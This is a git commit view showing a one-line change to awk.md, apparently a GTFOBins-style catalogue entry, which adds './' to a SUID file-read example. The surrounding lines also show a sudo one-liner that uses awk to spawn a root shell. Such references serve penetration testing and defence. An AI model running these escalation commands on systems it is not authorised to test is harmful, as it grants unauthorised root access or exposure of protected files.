Add ./ to SUID category in awk.md

master
Nick Blekherman 2021-01-18 09:44:34 +02:00 committed by GitHub
parent 3065294305
commit 085e72a971
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -30,7 +30,7 @@ functions:
suid: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
awk '//' "$LFILE" ./awk '//' "$LFILE"
sudo: sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
limited-suid: limited-suid: